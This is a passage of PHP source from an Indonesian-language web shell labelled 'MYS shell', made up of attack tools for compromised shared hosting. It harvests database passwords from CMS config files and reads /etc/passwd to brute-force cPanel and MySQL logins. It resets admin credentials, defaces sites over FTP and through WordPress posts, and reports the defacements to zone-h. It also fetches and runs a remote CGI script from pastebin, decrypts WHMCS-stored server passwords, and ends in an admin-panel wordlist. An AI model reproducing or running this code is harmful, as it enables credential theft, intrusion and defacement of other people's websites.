1299.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1300.                     $dbhost = ambilkata($config,'server = "','"');
1301.                     $dbuser = ambilkata($config,'username = "','"');
1302.                     $dbpass = ambilkata($config,'password = "','"');
1303.                     $dbname = ambilkata($config,'database = "','"');
1304.                     $prefix = "users";
1305.                     $option = "identitas";
1306.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1307.                     $db = mysql_select_db($dbname);
1308.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1309.                     $result = mysql_fetch_array($q);
1310.                     $target = $result[alamat_website];
1311.                     if($target == '') {
1312.                         $target2 = $result[url];
1313.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
1314.                         if($target2 == '') {
1315.                             $url_target2 = "Login => <font color=red>error, cant take the domain name</font><br>";
1316.                         } else {
1317.                             $cek_login3 = file_get_contents("$target2/adminweb/");
1318.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1319.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1320.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1321.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1322.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1323.                             } else {
1324.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>or where is the login admin :p</font> ]<br>";
1325.                             }
1326.                         }
1327.                     } else {
1328.                         $cek_login = file_get_contents("$target/adminweb/");
1329.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1330.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1331.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1332.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1333.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1334.                         } else {
1335.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1336.                         }
1337.                     }
1338.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1339.                     echo "Config => ".$file_conf."<br>";
1340.                     echo "CMS => Lokomedia Njai<br>";
1341.                     if(preg_match('/error, cant take the domain name/', $url_target)) {
1342.                         echo $url_target2;
1343.                     } else {
1344.                         echo $url_target;
1345.                     }
1346.                     if(!$update OR !$conn OR !$db) {
1347.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1348.                     } else {
1349.                         echo "Status => <font color=white>succses edit user, please log in with the user & new pass.</font><br><br>";
1350.                     }
1351.                     mysql_close($conn);
1352.                 }
1353.             }
1354.         }
1355.     } else {
1356.         echo "<center>
1357.         <h1>Auto Edit User Config</h1>
1358.         <form method='post'>
1359.         DIR Config: <br>
1360.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1361.         Set User & Pass: <br>
1362.         <input type='text' name='user_baru' value='mysteam' placeholder='user_baru'><br>
1363.         <input type='text' name='pass_baru' value='MYSteam2018' placeholder='pass_baru'><br>
1364.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1365.         </form>
1366.         <span>NB: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1367.         ";
1368.     }
1369. } elseif($_GET['do'] == 'cpanel') {
1370.     if($_POST['crack']) {
1371.         $usercp = explode("\r\n", $_POST['user_cp']);
1372.         $passcp = explode("\r\n", $_POST['pass_cp']);
1373.         $i = 0;
1374.         foreach($usercp as $ucp) {
1375.             foreach($passcp as $pcp) {
1376.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1377.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1378.                     } else {
1379.                         $_SESSION[$ucp] = "1";
1380.                         $_SESSION[$pcp] = "1";
1381.                         if($ucp == '' || $pcp == '') {
1382.                            
1383.                         } else {
1384.                             $i++;
1385.                             if(function_exists('posix_getpwuid')) {
1386.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
1387.                                 if($domain_cp == '') {
1388.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
1389.                                 } else {
1390.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1391.                                     foreach($domains_cp[1] as $dj) {
1392.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1393.                                         $user_cp_url = $user_cp_url['name'];
1394.                                         if($user_cp_url == $ucp) {
1395.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=white>$dj</font></a>";
1396.                                             break;
1397.                                         }
1398.                                     }
1399.                                 }
1400.                             } else {
1401.                                 $dom = "<font color=red>function is Disable by system</font>";
1402.                             }
1403.                             echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>) domain ($dom)<br>";
1404.                         }
1405.                     }
1406.                 }
1407.             }
1408.         }
1409.         if($i == 0) {
1410.         } else {
1411.             echo "<br>successful ".$i." Cpanel by <font color=red>MYS shell.</font>";
1412.         }
1413.     } else {
1414.         echo "<center>
1415.         <form method='post'>
1416.         USER: <br>
1417.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1418.         $_usercp = fopen("/etc/passwd","r");
1419.         while($getu = fgets($_usercp)) {
1420.             if($getu == '' || !$_usercp) {
1421.                 echo "<font color=red>Can't read /etc/passwd</font>";
1422.             } else {
1423.                 preg_match_all("/(.*?):x:/", $getu, $u);
1424.                 foreach($u[1] as $user_cp) {
1425.                         if(is_dir("/home/$user_cp/public_html")) {
1426.                             echo "$user_cp\n";
1427.                     }
1428.                 }
1429.             }
1430.         }
1431.         echo "</textarea><br>
1432.         PASS: <br>
1433.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1434.         function cp_pass($dir) {
1435.             $pass = "";
1436.             $dira = scandir($dir);
1437.             foreach($dira as $dirb) {
1438.                 if(!is_file("$dir/$dirb")) continue;
1439.                 $ambil = file_get_contents("$dir/$dirb");
1440.                 if(preg_match("/WordPress/", $ambil)) {
1441.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1442.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1443.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1444.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1445.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1446.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1447.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1448.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1449.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1450.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1451.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1452.                     if(preg_match('/"/', $pass1[1])) {
1453.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1454.                         $pass .= $pass1[1]."\n";
1455.                     } else {
1456.                         $pass .= $pass1[1]."\n";
1457.                     }
1458.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1459.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1460.                 }
1461.             }
1462.             echo $pass;
1463.         }
1464.         $cp_pass = cp_pass($dir);
1465.         echo $cp_pass;
1466.         echo "</textarea><br>
1467.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1468.         </form>
1469.         <span>Note: CPanel Crack auto get password ( pake db password ) it will work if it runs inside the folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1470.     }
1471. } elseif($_GET['do'] == 'cpftp_auto') {
1472.     if($_POST['crack']) {
1473.         $usercp = explode("\r\n", $_POST['user_cp']);
1474.         $passcp = explode("\r\n", $_POST['pass_cp']);
1475.         $i = 0;
1476.         foreach($usercp as $ucp) {
1477.             foreach($passcp as $pcp) {
1478.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1479.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1480.                     } else {
1481.                         $_SESSION[$ucp] = "1";
1482.                         $_SESSION[$pcp] = "1";
1483.                         if($ucp == '' || $pcp == '') {
1484.                             //
1485.                         } else {
1486.                             echo "[+] username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1487.                             $ftp_conn = ftp_connect($ip);
1488.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1489.                             if((!$ftp_login) || (!$ftp_conn)) {
1490.                                 echo "[+] <font color=red>Login Failed</font><br><br>";
1491.                             } else {
1492.                                 echo "[+] <font color=white>Login Succses</font><br>";
1493.                                 $fi = htmlspecialchars($_POST['file_deface']);
1494.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1495.                                 if($deface) {
1496.                                     $i++;
1497.                                     echo "[+] <font color=white>Deface Succses</font><br>";
1498.                                     if(function_exists('posix_getpwuid')) {
1499.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
1500.                                         if($domain_cp == '') {
1501.                                             echo "[+] <font color=red>cant take the domain name</font><br><br>";
1502.                                         } else {
1503.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1504.                                             foreach($domains_cp[1] as $dj) {
1505.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1506.                                                 $user_cp_url = $user_cp_url['name'];
1507.                                                 if($user_cp_url == $ucp) {
1508.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1509.                                                     break;
1510.                                                 }
1511.                                             }
1512.                                         }
1513.                                     } else {
1514.                                         echo "[+] <font color=red>cant take the domain name</font><br><br>";
1515.                                     }
1516.                                 } else {
1517.                                     echo "[-] <font color=red>Deface Failed</font><br><br>";
1518.                                 }
1519.                             }
1520.                             //echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1521.                         }
1522.                     }
1523.                 }
1524.             }
1525.         }
1526.         if($i == 0) {
1527.         } else {
1528.             echo "<br>success deface ".$i." Cpanel by <font color=white>MYS shell</font>";
1529.         }
1530.     } else {
1531.         echo "<center>
1532.         <form method='post'>
1533.         Filename: <br>
1534.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1535.         Deface Page: <br>
1536.         <input type='text' name='deface' placeholder='http://www.the-web-is-deface.com/file.php' style='width: 450px;'><br>
1537.         USER: <br>
1538.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1539.         $_usercp = fopen("/etc/passwd","r");
1540.         while($getu = fgets($_usercp)) {
1541.             if($getu == '' || !$_usercp) {
1542.                 echo "<font color=red>Can't read /etc/passwd</font>";
1543.             } else {
1544.                 preg_match_all("/(.*?):x:/", $getu, $u);
1545.                 foreach($u[1] as $user_cp) {
1546.                         if(is_dir("/home/$user_cp/public_html")) {
1547.                             echo "$user_cp\n";
1548.                     }
1549.                 }
1550.             }
1551.         }
1552.         echo "</textarea><br>
1553.         PASS: <br>
1554.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1555.         function cp_pass($dir) {
1556.             $pass = "";
1557.             $dira = scandir($dir);
1558.             foreach($dira as $dirb) {
1559.                 if(!is_file("$dir/$dirb")) continue;
1560.                 $ambil = file_get_contents("$dir/$dirb");
1561.                 if(preg_match("/WordPress/", $ambil)) {
1562.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1563.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1564.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1565.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1566.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1567.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1568.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1569.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1570.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1571.                 } elseif(preg_match("/client/", $ambil)) {
1572.                     preg_match("/password=(.*)/", $ambil, $pass1);
1573.                     if(preg_match('/"/', $pass1[1])) {
1574.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1575.                         $pass .= $pass1[1]."\n";
1576.                     }
1577.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1578.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1579.                 }
1580.             }
1581.             echo $pass;
1582.         }
1583.         $cp_pass = cp_pass($dir);
1584.         echo $cp_pass;
1585.         echo "</textarea><br>
1586.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1587.         </form>
1588.         <span>NB: CPanel Crack auto get password ( pake db password ) Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1589.     }
1590. } elseif($_GET['do'] == 'smtp') {
1591.     echo "<center><span>NB: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1592.     function scj($dir) {
1593.         $dira = scandir($dir);
1594.         foreach($dira as $dirb) {
1595.             if(!is_file("$dir/$dirb")) continue;
1596.             $ambil = file_get_contents("$dir/$dirb");
1597.             $ambil = str_replace("$", "", $ambil);
1598.             if(preg_match("/JConfig|joomla/", $ambil)) {
1599.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1600.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1601.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1602.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1603.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1604.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1605.                 echo "SMTP Host: <font color=white>$smtp_host</font><br>";
1606.                 echo "SMTP port: <font color=white>$smtp_port</font><br>";
1607.                 echo "SMTP user: <font color=white>$smtp_user</font><br>";
1608.                 echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
1609.                 echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
1610.                 echo "SMTP secure: <font color=white>$smtp_secure</font><br><br>";
1611.             }
1612.         }
1613.     }
1614.     $smpt_hunter = scj($dir);
1615.     echo $smpt_hunter;
1616. } elseif($_GET['do'] == 'auto_wp') {
1617.     if($_POST['hajar']) {
1618.         $title = htmlspecialchars($_POST['new_title']);
1619.         $pn_title = str_replace(" ", "-", $title);
1620.         if($_POST['cek_edit'] == "Y") {
1621.             $script = $_POST['edit_content'];
1622.         } else {
1623.             $script = $title;
1624.         }
1625.         $conf = $_POST['config_dir'];
1626.         $scan_conf = scandir($conf);
1627.         foreach($scan_conf as $file_conf) {
1628.             if(!is_file("$conf/$file_conf")) continue;
1629.             $config = file_get_contents("$conf/$file_conf");
1630.             if(preg_match("/WordPress/", $config)) {
1631.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1632.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1633.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1634.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1635.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1636.                 $prefix = $dbprefix."posts";
1637.                 $option = $dbprefix."options";
1638.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1639.                 $db = mysql_select_db($dbname);
1640.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1641.                 $result = mysql_fetch_array($q);
1642.                 $id = $result[ID];
1643.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1644.                 $result2 = mysql_fetch_array($q2);
1645.                 $target = $result2[option_value];
1646.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1647.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1648.                 echo "<div style='margin: 5px auto;'>";
1649.                 if($target == '') {
1650.                     echo "URL: <font color=red>error, cant take the domain name</font> -> ";
1651.                 } else {
1652.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1653.                 }
1654.                 if(!$update OR !$conn OR !$db) {
1655.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1656.                 } else {
1657.                     echo "<font color=white>success replaced.</font><br>";
1658.                 }
1659.                 echo "</div>";
1660.                 mysql_close($conn);
1661.             }
1662.         }
1663.     } else {
1664.         echo "<center>
1665.         <h1>Auto Edit Title+Content WordPress</h1>
1666.         <form method='post'>
1667.         DIR Config: <br>
1668.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1669.         Set Title: <br>
1670.         <input type='text' name='new_title' value='Hacked by Ameer_Awwad & MHM' placeholder='New Title'><br><br>
1671.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1672.         <span>If you choose <u>Y</u> enter your defac script ( simple advice ),if you choose <u>N</u> it's hard to fill.</span><br>
1673.         <textarea name='edit_content' placeholder='script example: https://pastebin.com/hbkUvinW' style='width: 450px; height: 150px;'></textarea><br>
1674.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1675.         </form>
1676.         <span>NB: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1677.         ";
1678.     }
1679. } elseif($_GET['do'] == 'zoneh') {
1680.     if($_POST['submit']) {
1681.         $domain = explode("\r\n", $_POST['url']);
1682.         $nick =  $_POST['nick'];
1683.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1684.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1685.         function zoneh($url,$nick) {
1686.             $ch = curl_init("http://www.zone-h.com/notify/single");
1687.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1688.                   curl_setopt($ch, CURLOPT_POST, true);
1689.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1690.             return curl_exec($ch);
1691.                   curl_close($ch);
1692.         }
1693.         foreach($domain as $url) {
1694.             $zoneh = zoneh($url,$nick);
1695.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1696.                 echo "$url -> <font color=white>OK</font><br>";
1697.             } else {
1698.                 echo "$url -> <font color=red>ERROR</font><br>";
1699.             }
1700.         }
1701.     } else {
1702.         echo "<center><form method='post'>
1703.         <u>Defacer</u>: <br>
1704.         <input type='text' name='nick' size='50' value='M.Y.S'><br>
1705.         <u>Domains</u>: <br>
1706.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1707.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1708.         </form>";
1709.     }
1710.     echo "</center>";
1711. } elseif($_GET['do'] == 'cgi') {
1712.     $cgi_dir = mkdir('idx_cgi', 0755);
1713.     $file_cgi = "idx_cgi/cgi.izo";
1714.     $isi_htcgi = "AddHandler cgi-script .izo";
1715.     $htcgi = fopen(".htaccess", "w");
1716.     fwrite($htcgi, $isi_htcgi);
1717.     fclose($htcgi);
1718.     $cgi_script = getsource("https://pastebin.com/raw/rZGBHWXQ");
1719.     $cgi = fopen($file_cgi, "w");
1720.     fwrite($cgi, $cgi_script);
1721.     fclose($cgi);
1722.     chmod($file_cgi, 0755);
1723.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1724. }elseif(isset($_GET['do']) && ($_GET['do'] == 'whmcsdecod'))
1725. {
1726. ?>
1727. <form action="?y=<?php echo $pwd; ?>&amp;do=whmcs" method="post">
1728.  
1729. <?php
1730.  
1731. function decrypt ($string,$cc_encryption_hash)
1732. {
1733.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
1734.     $hash_key = _hash ($key);
1735.     $hash_length = strlen ($hash_key);
1736.     $string = base64_decode ($string);
1737.     $tmp_iv = substr ($string, 0, $hash_length);
1738.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
1739.     $iv = $out = '';
1740.     $c = 0;
1741.     while ($c < $hash_length)
1742.     {
1743.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
1744.         ++$c;
1745.     }
1746.     $key = $iv;
1747.     $c = 0;
1748.     while ($c < strlen ($string))
1749.     {
1750.         if (($c != 0 AND $c % $hash_length == 0))
1751.         {
1752.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
1753.         }
1754.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
1755.         ++$c;
1756.     }
1757.     return $out;
1758. }
1759.  
1760. function _hash ($string)
1761. {
1762.     if (function_exists ('sha1'))
1763.     {
1764.         $hash = sha1 ($string);
1765.     }
1766.     else
1767.     {
1768.         $hash = md5 ($string);
1769.     }
1770.     $out = '';
1771.     $c = 0;
1772.     while ($c < strlen ($hash))
1773.     {
1774.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
1775.         $c += 2;
1776.     }
1777.     return $out;
1778. }
1779.  
1780. echo "
1781. <br><center><font size='5' color='#FFFFFF'><b>-=[ WHMCS Decoder ]=-</b></font></center>
1782. <center>
1783. <br>
1784.  
1785. <FORM action=''  method='post'>
1786. <input type='hidden' name='form_action' value='2'>
1787. <br>
1788. <table class=tabnet style=width:320px;padding:0 1px;>
1789. <tr><th colspan=2>WHMCS Decoder</th></tr>
1790. <tr><td>db_host </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
1791. <tr><td>db_username </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
1792. <tr><td>db_password</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
1793. <tr><td>db_name</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
1794. <tr><td>cc_encryption_hash</td><td><input style='color:#FFFFFF;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
1795. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FFFFFF;background-color:'  value='Submit' name='Submit'></td>
1796. </table>
1797. </FORM>
1798. </center>
1799. ";
1800.  
1801.  if($_POST['form_action'] == 2 )
1802.  {
1803.  //include($file);
1804.  $db_host=($_POST['db_host']);
1805.  $db_username=($_POST['db_username']);
1806.  $db_password=($_POST['db_password']);
1807.  $db_name=($_POST['db_name']);
1808.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
1809.  
1810.  
1811.  
1812.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1813.         mysql_select_db($db_name,$link) ;
1814. $query = mysql_query("SELECT * FROM tblservers");
1815. while($v = mysql_fetch_array($query)) {
1816. $ipaddress = $v['ipaddress'];
1817. $username = $v['username'];
1818. $type = $v['type'];
1819. $active = $v['active'];
1820. $hostname = $v['hostname'];
1821. echo("<center><table border='1'>");
1822. $password = decrypt ($v['password'], $cc_encryption_hash);
1823. echo("<tr><td>Type</td><td>$type</td></tr>");
1824. echo("<tr><td>Active</td><td>$active</td></tr>");
1825. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1826. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1827. echo("<tr><td>Username</td><td>$username</td></tr>");
1828. echo("<tr><td>Password</td><td>$password</td></tr>");
1829.  
1830. echo "</table><br><br></center>";
1831. }
1832.  
1833.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1834.         mysql_select_db($db_name,$link) ;
1835. $query = mysql_query("SELECT * FROM tblregistrars");
1836. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
1837. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1838. while($v = mysql_fetch_array($query)) {
1839. $registrar     = $v['registrar'];
1840. $setting = $v['setting'];
1841. $value = decrypt ($v['value'], $cc_encryption_hash);
1842. if ($value=="") {
1843. $value=0;
1844. }
1845. $password = decrypt ($v['password'], $cc_encryption_hash);
1846. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1847. }
1848. }
1849. } elseif(isset($_GET['do']) && ($_GET['do'] == 'adfin'))
1850. {
1851. ?>
1852. <form action="?y=<?php echo $pwd; ?>&amp;do=adfin" method="post">
1853.  
1854. <?php
1855. set_time_limit(0);
1856. error_reporting(0);
1857. $list['front'] ="admin
1858. adm
1859. admincp
1860. admcp
1861. cp
1862. modcp
1863. moderatorcp
1864. adminare
1865. admins
1866. cpanel
1867. controlpanel";
1868. $list['end'] = "admin1.php
1869. adm/
1870. _adm_
1871. _admin_
1872. _administrator_
1873. operator
1874. sika
1875. adminweb
1876. develop
1877. ketua
1878. redaktur
1879. author
1880. user
1881. users
1882. dinkesadmin
1883. retel
1884. panel
1885. paneladmin
1886. panellogin
1887. redaksi
1888. cp-admin
1889. Login@web
1890. admin1
1891. admin2
1892. admin3
1893. admin4
1894. admin5
1895. admin6
1896. admin7
1897. admin8
1898. admin9
1899. admin10
1900. master
1901. master/index.php
1902. master/login.php
1903. terasadmin/index.php
1904. terasadmin/login.php
1905. rahasia
1906. rahasia/login.php
1907. rahasia/admin.php
1908. rahasia/index.php
1909. dinkesadmin/login.php
1910. adminpmb
1911. adminpmb/index.php
1912. adminpmb/login.php
1913. system
1914. system/index.php
1915. system/login.php
1916. system/admin.php
1917. webadmin
1918. webadmin/index.php
1919. webadmin/login.php
1920. wpanel
1921. wpanel/index.php
1922. wpanel/login.php
1923. adminpanel
1924. adminpanel/index.php
1925. adminpanel/login.php
1926. adminkec
1927. adminkec/index.php
1928. adminkec/login.php
1929. admindesa
1930. admindesa/index.php
1931. admindesa/login.php
1932. adminkota
1933. adminkota/index.php
1934. adminkota/login.php
1935. admin123
1936. admin123/index.php
1937. admin123/login.php
1938. logout
1939. logout/index.php
1940. logout/login.php
1941. logout/admin.php
1942. adminweb_setting
1943. admin1.html
1944. admin
1945. administrator
1946. admin1.html
1947. admin2.php
1948. admin2.html
1949. yonetim.php
1950. yonetim.html
1951. yonetici.php
1952. yonetici.html
1953. ccms/
1954. ccms/login.php
1955. ccms/index.php
1956. maintenance/
1957. webmaster/
1958. adm/
1959. configuration/
1960. configure/
1961. websvn/
1962. admin/
1963. admin/account.php
1964. admin/account.html
1965. admin/index.php
1966. admin/index.html
1967. admin/login.php
1968. admin/login.html
1969. admin/home.php
1970. admin/controlpanel.html
1971. admin/controlpanel.php
1972. admin.php
1973. admin.html
1974. admin/cp.php
1975. admin/cp.html
1976. cp.php
1977. cp.html
1978. administrator/
1979. administrator/index.html
1980. administrator/index.php
1981. administrator/login.html
1982. administrator/login.php
1983. administrator/account.html
1984. administrator/account.php
1985. administrator.php
1986. administrator.html
1987. login.php
1988. login.html
1989. modelsearch/login.php
1990. moderator.php
1991. moderator.html
1992. moderator/login.php
1993. moderator/login.html
1994. moderator/admin.php
1995. moderator/admin.html
1996. moderator/
1997. account.php
1998. account.html
1999. controlpanel/
2000. controlpanel.php
2001. controlpanel.html
2002. admincontrol.php
2003. admincontrol.html
2004. adminpanel.php
2005. adminpanel.html
2006. admin1.asp
2007. admin2.asp
2008. yonetim.asp
2009. yonetici.asp
2010. admin/account.asp
2011. admin/index.asp
2012. admin/login.asp
2013. admin/home.asp
2014. admin/controlpanel.asp
2015. admin.asp
2016. admin/cp.asp
2017. cp.asp
2018. administrator/index.asp
2019. administrator/login.asp
2020. administrator/account.asp
2021. administrator.asp
2022. login.asp
2023. modelsearch/login.asp
2024. moderator.asp
2025. moderator/login.asp
2026. moderator/admin.asp
2027. account.asp
2028. controlpanel.asp
2029. admincontrol.asp
2030. adminpanel.asp
2031. fileadmin/
2032. fileadmin.php
2033. fileadmin.asp
2034. fileadmin.html
2035. administration/
2036. administration.php
2037. administration.html
2038. sysadmin.php
2039. sysadmin.html
2040. phpmyadmin/
2041. myadmin/
2042. sysadmin.asp
2043. sysadmin/
2044. ur-admin.asp
2045. ur-admin.php
2046. ur-admin.html
2047. ur-admin/
2048. Server.php
2049. Server.html
2050. Server.asp
2051. Server/
2052. wp-admin/
2053. administr8.php
2054. administr8.html
2055. administr8/
2056. administr8.asp
2057. webadmin/
2058. webadmin.php
2059. webadmin.asp
2060. webadmin.html
2061. administratie/
2062. admins/
2063. admins.php
2064. admins.asp
2065. admins.html
2066. administrivia/
2067. Database_Administration/
2068. WebAdmin/
2069. useradmin/
2070. sysadmins/
2071. admin1/
2072. system-administration/
2073. administrators/
2074. pgadmin/
2075. directadmin/
2076. staradmin/
2077. ServerAdministrator/
2078. SysAdmin/
2079. administer/
2080. LiveUser_Admin/
2081. sys-admin/
2082. typo3/
2083. panel/
2084. cpanel/
2085. cPanel/
2086. cpanel_file/
2087. platz_login/
2088. rcLogin/
2089. blogindex/
2090. formslogin/
2091. autologin/
2092. support_login/
2093. meta_login/
2094. manuallogin/
2095. simpleLogin/
2096. loginflat/
2097. utility_login/
2098. showlogin/
2099. memlogin/
